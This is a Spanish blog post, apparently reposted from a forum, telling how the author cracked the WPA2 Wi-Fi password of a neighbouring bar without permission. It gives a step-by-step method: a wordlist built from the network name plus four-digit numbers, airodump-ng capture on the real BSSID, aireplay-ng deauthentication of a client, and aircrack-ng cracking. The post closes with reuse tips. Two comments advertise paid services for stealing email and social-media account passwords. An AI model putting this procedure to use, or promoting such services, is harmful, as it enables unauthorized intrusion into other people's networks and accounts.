jueves, 5 de junio de 2014

Ingenierí­a Social aplicada al crackeo de redes WPA/WPA2

NOTA: este metodo puede o no funcionar, en mi caso fue simplemente un razonamiento aplicado a esta red. Pueda que nunca crackies un WPA/WPA2 con este funcionamiento.

LA HISTORIA:

resulta que estando con un par de amigos encontramos una red con buena calidad que era de un bar cercano llamado "Viejo Correo" y todos los pibes como me conocen... -Che, hackiate la red esa asi tenemos internet...- tipico como si fuera tan facil y bueno lo primero que hice fue ver el cifrado, cuando vi que era WPA2 con PSK (CCMP) les dije que era gratamente imposible, ya que es un cifrado muy sofisticado. entonces me dicen -y bueno proba haber que onda...- y bueno lo hice....

PROCEDIMIENTOS:

1.- la red se llamaba "Viejo Correo", se llamaba asi porque esta enfrente de un Correo; entonces cree un diccionario con palabras clave como:

correo
correozona
zonacorreo
correoviejo
correobar
correoviejobar
correobarviejo


y asi fui pensando contraseíñas que le podrian haber puesto. desde ya que la lista era un poco mí¡s larga. despues con el SGen fui creando diccionarios pero agregandole a cada palabra numeros; tome como referencia 4 numeros fue pura casualidad; enconces genere un diccionario con cada palabra + numero de 4 cifras. ejemplo:

correo0000 -> correo9999
correozona0000 -> correozona9999
correobarviejo0000 -> correobarviejo9999


aun asi sin saber el rango de digitos de la contraseíña pence que tendria que ser chica para que los clientes puedan escribirla ellos mismos. Enconces junte todo en un diccionario y me fui al AirUbuntu 10.04.

CRACKEO:

primero lance un airodump-ng para ver la informacion de la red.

Código: [Seleccionar]
airodump-ng -w cap mon0


luego hice:

Código: [Seleccionar]
airodump-ng -c 11 -w viejocorreo --bssid 54:E6:FC:AB:0B:48 mon0

ya ahora estaba capturando los #Datas. Espere a ver todos los users y seleccione el user con mayor transferencia de Paquetes.

Luego lance el Aireplay:

Código: [Seleccionar]
aireplay-ng -0 5 -a 54:E6:FC:AB:0B:48 -c 1C:4B:D6:68:92:2B mon0

sale handshake en airodump-ng y continuo con el crack:

Código: [Seleccionar]
aircrack-ng -w /home/diccionario.lst -b 54:E6:FC:AB:0B:48 viejocorreo-01.cap

y comenzo a crackear y a los pocos segundos ya la tenia crackeada, me quede duro de saber que la crackie sin ningun diccionario de 30GB que talves ni siquiera tenga la contraseíña. lo raro fue que las key que probí, figuran 8 pero probo como 3000... jjeje fue mí¡s pura suerte, los pibes se quedaron re contentos... jajaj  :'(



Comprobando la contraseíña:


TIPS PARA TENER EN CUENTA:
* nombre o nombres posibles de personas.
* ver el nombre de la red y preguntarnos ¿Que password le pondria?
* agragarle numero com referencia.

Fuente: http://www.arg-wireless.com.ar/index.php?topic=382.0

2 comentarios:

  1. BUEN DIA
    Mi nombre es Mauricio Giraldo y soy ingeniero de sistemas de la universidad Nacional, especialista en Ingeniería de Software. Con más de 9 años de experiencia totalmente preparado para prestar este servicio, soy una persona seria y garantizada en mi trabajo, manejo un sistema eficaz y un proceso que lo dejara satisfecho. Trabajo con el servicio de HACKEO DE cuentas HOTMAIL, FACEBOOK, GMAIL, YAHOO, INSTAGRAM. Manejo un método eficaz, rápido, discreto para robar las contraseñas de la persona que más necesita saber e investigar, puede estar tranquilo que esa persona no se dará cuenta de nada y soy una persona sincera con el fin de ayudar a los demás; para ello me deben dejar un correo en mi cuenta, explicándome que servicio desean.
    Estoy totalmente preparado para prestar este servicio y soy una persona seria en esto, manejo un sistema eficaz y un proceso que lo dejara satisfecho. Si no está seguro del trabajo Mío no haga el pago.
    MI CORREO ES: mauriciogiraldoing@gmail.com

    Mauricio Giraldo
    mauriciogiraldoing@gmail.com

    ResponderEliminar
  2. BUEN DIA
    Mi nombre es FELIPE ARANGO y soy ingeniero de sistemas de la universidad Nacional, especialista en Ingeniería de Software. Con más de 9 años de experiencia totalmente preparado para prestar este servicio, soy una persona seria y garantizada en mi trabajo, manejo un sistema eficaz y un proceso que lo dejara satisfecho. Trabajo con el servicio de HACKEO DE cuentas HOTMAIL, FACEBOOK, GMAIL, YAHOO, INSTAGRAM. Manejo un método eficaz, rápido, discreto para robar las contraseñas de la persona que más necesita saber e investigar, puede estar tranquilo que esa persona no se dará cuenta de nada y soy una persona sincera con el fin de ayudar a los demás; para ello me deben dejar un correo en mi cuenta, explicándome que servicio desean.
    Estoy totalmente preparado para prestar este servicio y soy una persona seria en esto, manejo un sistema eficaz y un proceso que lo dejara satisfecho. Si no está seguro del trabajo Mío no haga el pago.
    MI CORREO ES: pipesistemas66@gmail.com

    ResponderEliminar